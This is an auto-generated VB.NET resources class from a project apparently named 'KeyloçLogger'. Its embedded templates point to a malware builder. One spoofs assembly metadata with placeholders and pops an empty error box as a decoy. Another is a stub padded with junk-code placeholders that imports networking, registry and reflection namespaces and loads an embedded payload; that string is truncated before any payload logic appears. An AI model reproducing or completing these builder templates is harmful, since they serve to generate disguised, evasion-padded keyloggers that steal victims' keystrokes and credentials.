'------------------------------------------------------------------------------
' <auto-generated>
'     This code was generated by a tool.
'     Runtime Version:4.0.30319.296
'
'     Changes to this file may cause incorrect behavior and will be lost if
'     the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------

Option Strict On
Option Explicit On

Imports System

Namespace My.Resources
    
    'This class was auto-generated by the StronglyTypedResourceBuilder
    'class via a tool like ResGen or Visual Studio.
    'To add or remove a member, edit your .ResX file then rerun ResGen
    'with the /str option, or rebuild your VS project.
    '''<summary>
    '''  A strongly-typed resource class, for looking up localized strings, etc.
    '''</summary>
    <Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0"),  _
     Global.System.Diagnostics.DebuggerNonUserCodeAttribute(),  _
     Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(),  _
     Global.Microsoft.VisualBasic.HideModuleNameAttribute()>  _
    Friend Module Resources
        
        Private resourceMan As Global.System.Resources.ResourceManager
        
        Private resourceCulture As Global.System.Globalization.CultureInfo
        
        '''<summary>
        '''  Returns the cached ResourceManager instance used by this class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
            Get
                If Object.ReferenceEquals(resourceMan, Nothing) Then
                    Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("KeyloçLogger.Resources", GetType(Resources).Assembly)
                    resourceMan = temp
                End If
                Return resourceMan
            End Get
        End Property
        
        '''<summary>
        '''  Overrides the current thread's CurrentUICulture property for all
        '''  resource lookups using this strongly typed resource class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend Property Culture() As Global.System.Globalization.CultureInfo
            Get
                Return resourceCulture
            End Get
            Set
                resourceCulture = value
            End Set
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Imports System.Windows.Forms
        '''Imports System.Reflection
        '''
        '''&lt;Assembly: AssemblyTitle(&quot;*Title*&quot;)&gt;
        '''&lt;Assembly: AssemblyCompany(&quot;*Company*&quot;)&gt; 
        '''&lt;Assembly: AssemblyProduct(&quot;*Product*&quot;)&gt; 
        '''&lt;Assembly: AssemblyCopyright(&quot;*Copyright*&quot;)&gt; 
        '''&lt;Assembly: AssemblyTrademark(&quot;*Trademark*&quot;)&gt; 
        '''&lt;Assembly: AssemblyVersion(&quot;*version*&quot;)&gt;
        '''
        '''Module X
        '''    Sub Main()
        '''    	MessageBox.Show(&quot;&quot;, &quot;&quot;, MessageBoxButtons.OK, MessageBoxIcon.Error)
        '''    End Sub
        '''End Module.
        '''</summary>
        Friend ReadOnly Property AssemblyChange() As String
            Get
                Return ResourceManager.GetString("AssemblyChange", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to %junk2%
        '''Imports System
        '''Imports System.IO
        '''Imports Microsoft.VisualBasic
        '''Imports System.Threading
        '''Imports System.Net
        '''Imports Microsoft.Win32
        '''Imports System.Reflection
        '''Imports System.Runtime.InteropServices
        '''Imports System.Collections
        '''Imports System.Diagnostics
        '''%junk1%
        '''%mod%
        '''    %junk18%
        '''    Sub Main()
        '''        %junk3%
        '''        Dim data As Byte()
        '''        %junk9%
        '''        Dim oFileStream As System.IO.FileStream
        '''        %junk4% 
        '''        Dim runTimeResourceSet As Object
        '''        %junk5%
        '''        D [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property dl() As String
            Get
                Return ResourceManager.GetString("dl", resourceCulture)
            End Get
        End Property
        
        Friend ReadOnly Property Res() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("Res", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
    End Module
End Namespace
